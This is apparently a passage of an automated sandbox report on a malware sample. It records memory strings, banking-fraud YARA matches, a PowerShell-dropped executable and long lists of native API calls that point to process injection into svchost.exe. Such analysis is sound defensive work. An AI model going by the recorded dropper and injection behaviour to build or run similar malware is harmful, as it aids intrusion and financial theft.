            Source: Opfattelsers.exe, 00000006.00000001.2794074840.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: powershell.exe, 00000002.00000002.2799477621.0000000006E0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5sPu7
            Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: svchost.exe, 00000009.00000002.3360110277.0000000003029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: svchost.exe, 00000009.00000003.3216409535.0000000008100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: svchost.exe, 00000009.00000002.3360142392.0000000003040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: svchost.exe, 00000009.00000002.3360110277.0000000003029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: powershell.exe, 00000002.00000002.2797989403.0000000005746000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: svchost.exe, 00000009.00000003.3220845054.0000000008536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405705

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000009.00000002.3360830946.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3359528997.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053262929.000000001F460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3360872808.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3053719794.0000000020EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361007357.00000000042C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E35C0 NtCreateMutant,LdrInitializeThunk,6_2_1F7E35C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_1F7E2DF0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_1F7E2C70
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2B60 NtClose,LdrInitializeThunk,6_2_1F7E2B60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E3D70 NtOpenThread,6_2_1F7E3D70
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E3D10 NtOpenProcessToken,6_2_1F7E3D10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E39B0 NtGetContextThread,6_2_1F7E39B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E3010 NtOpenDirectoryObject,6_2_1F7E3010
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E3090 NtSetValueKey,6_2_1F7E3090
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2F60 NtCreateProcessEx,6_2_1F7E2F60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2F30 NtCreateSection,6_2_1F7E2F30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2FE0 NtCreateFile,6_2_1F7E2FE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2FB0 NtResumeThread,6_2_1F7E2FB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2FA0 NtQuerySection,6_2_1F7E2FA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2F90 NtProtectVirtualMemory,6_2_1F7E2F90
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2E30 NtWriteVirtualMemory,6_2_1F7E2E30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2EE0 NtQueueApcThread,6_2_1F7E2EE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2EA0 NtAdjustPrivilegesToken,6_2_1F7E2EA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2E80 NtReadVirtualMemory,6_2_1F7E2E80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2D30 NtUnmapViewOfSection,6_2_1F7E2D30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2D10 NtMapViewOfSection,6_2_1F7E2D10
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2D00 NtSetInformationFile,6_2_1F7E2D00
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2DD0 NtDelayExecution,6_2_1F7E2DD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2DB0 NtEnumerateKey,6_2_1F7E2DB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2C60 NtCreateKey,6_2_1F7E2C60
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2C00 NtQueryInformationProcess,6_2_1F7E2C00
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2CF0 NtOpenProcess,6_2_1F7E2CF0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2CC0 NtQueryVirtualMemory,6_2_1F7E2CC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2CA0 NtQueryInformationToken,6_2_1F7E2CA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2BF0 NtAllocateVirtualMemory,6_2_1F7E2BF0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2BE0 NtQueryValueKey,6_2_1F7E2BE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2BA0 NtEnumerateValueKey,6_2_1F7E2BA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2B80 NtQueryInformationFile,6_2_1F7E2B80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2AF0 NtWriteFile,6_2_1F7E2AF0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2AD0 NtReadFile,6_2_1F7E2AD0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E2AB0 NtWaitForSingleObject,6_2_1F7E2AB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E4650 NtSuspendThread,6_2_1F7E4650
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E4340 NtSetContextThread,6_2_1F7E4340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03774340 NtSetContextThread,LdrInitializeThunk,9_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03774650 NtSuspendThread,LdrInitializeThunk,9_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772B60 NtClose,LdrInitializeThunk,9_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772AF0 NtWriteFile,LdrInitializeThunk,9_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772AD0 NtReadFile,LdrInitializeThunk,9_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772F30 NtCreateSection,LdrInitializeThunk,9_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772FE0 NtCreateFile,LdrInitializeThunk,9_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772FB0 NtResumeThread,LdrInitializeThunk,9_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772DD0 NtDelayExecution,LdrInitializeThunk,9_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772C60 NtCreateKey,LdrInitializeThunk,9_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037735C0 NtCreateMutant,LdrInitializeThunk,9_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037739B0 NtGetContextThread,LdrInitializeThunk,9_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772B80 NtQueryInformationFile,9_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772AB0 NtWaitForSingleObject,9_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772F60 NtCreateProcessEx,9_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772FA0 NtQuerySection,9_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772F90 NtProtectVirtualMemory,9_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772E30 NtWriteVirtualMemory,9_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772EA0 NtAdjustPrivilegesToken,9_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772D00 NtSetInformationFile,9_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772DB0 NtEnumerateKey,9_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772C00 NtQueryInformationProcess,9_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772CF0 NtOpenProcess,9_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03772CC0 NtQueryVirtualMemory,9_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03773010 NtOpenDirectoryObject,9_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03773090 NtSetValueKey,9_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03773D70 NtOpenThread,9_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03773D10 NtOpenProcessToken,9_2_03773D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029D9230 NtCreateFile,9_2_029D9230
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029D9390 NtReadFile,9_2_029D9390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029D9670 NtAllocateVirtualMemory,9_2_029D9670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029D9480 NtDeleteFile,9_2_029D9480
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_029D9520 NtClose,9_2_029D9520
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
            Source: C:\Users\user\Desktop\Forhandlingsfriheden.exeCode function: 0_2_00406C5F0_2_00406C5F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86FFB16_2_1F86FFB1
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86FF096_2_1F86FF09
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B1F926_2_1F7B1F92
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B9EB06_2_1F7B9EB0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B3D406_2_1F7B3D40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFDC06_2_1F7CFDC0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F861D5A6_2_1F861D5A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F867D736_2_1F867D73
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86FCF26_2_1F86FCF2
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F829C326_2_1F829C32
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F825BF06_2_1F825BF0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7EDBF96_2_1F7EDBF9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86FB766_2_1F86FB76
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CFB806_2_1F7CFB80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F851AA36_2_1F851AA3
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84DAAC6_2_1F84DAAC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85DAC66_2_1F85DAC6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F867A466_2_1F867A46
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86FA496_2_1F86FA49
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7F5AA06_2_1F7F5AA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F823A6C6_2_1F823A6C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B99506_2_1F7B9950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CB9506_2_1F7CB950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8459106_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F81D8006_2_1F81D800
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B38E06_2_1F7B38E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86F7B06_2_1F86F7B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8616CC6_2_1F8616CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7F56306_2_1F7F5630
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84D5B06_2_1F84D5B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8675716_2_1F867571
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A14606_2_1F7A1460
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86F43F6_2_1F86F43F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79D34C6_2_1F79D34C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86132D6_2_1F86132D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7F739A6_2_1F7F739A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8512ED6_2_1F8512ED
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CB2C06_2_1F7CB2C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B52A06_2_1F7B52A0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F1726_2_1F79F172
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E516C6_2_1F7E516C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BB1B06_2_1F7BB1B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B16B6_2_1F87B16B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F0CC6_2_1F85F0CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86F0E06_2_1F86F0E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8670E96_2_1F8670E9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B70C06_2_1F7B70C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82EFA06_2_1F82EFA0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D0F306_2_1F7D0F30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7F2F286_2_1F7F2F28
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BCFE06_2_1F7BCFE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A2FC86_2_1F7A2FC8
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F852F306_2_1F852F30
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F824F406_2_1F824F40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86CE936_2_1F86CE93
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B0E596_2_1F7B0E59
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86EEDB6_2_1F86EEDB
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86EE266_2_1F86EE26
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C2E906_2_1F7C2E90
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BAD006_2_1F7BAD00
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AADE06_2_1F7AADE0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84CD1F6_2_1F84CD1F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C8DBF6_2_1F7C8DBF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F850CB56_2_1F850CB5
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B0C006_2_1F7B0C00
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A0CF26_2_1F7A0CF2
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F866BD76_2_1F866BD7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86AB406_2_1F86AB40
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AEA806_2_1F7AEA80
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C69626_2_1F7C6962
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87A9A66_2_1F87A9A6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B29A06_2_1F7B29A0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BA8406_2_1F7BA840
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B28406_2_1F7B2840
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DE8F06_2_1F7DE8F0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7968B86_2_1F7968B8
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B07706_2_1F7B0770
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D47506_2_1F7D4750
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AC7C06_2_1F7AC7C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CC6E06_2_1F7CC6E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8705916_2_1F870591
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B05356_2_1F7B0535
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85E4F66_2_1F85E4F6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8544206_2_1F854420
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8624466_2_1F862446
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8703E66_2_1F8703E6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BE3F06_2_1F7BE3F0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86A3526_2_1F86A352
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8302C06_2_1F8302C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8502746_2_1F850274
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8641A26_2_1F8641A2
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8701AA6_2_1F8701AA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8681CC6_2_1F8681CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A01006_2_1F7A0100
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84A1186_2_1F84A118
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8381586_2_1F838158
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8420006_2_1F842000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FA3529_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_038003E69_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0374E3F09_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E02749_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037C02C09_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037C81589_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_038001AA9_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037DA1189_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037301009_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F81CC9_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F41A29_2_037F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037D20009_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037407709_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037647509_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0373C7C09_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0375C6E09_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_038005919_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037405359_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F24469_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037E44209_2_037E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037EE4F69_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037FAB409_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037F6BD79_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0373EA809_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037569629_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0380A9A69_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037429A09_2_037429A0
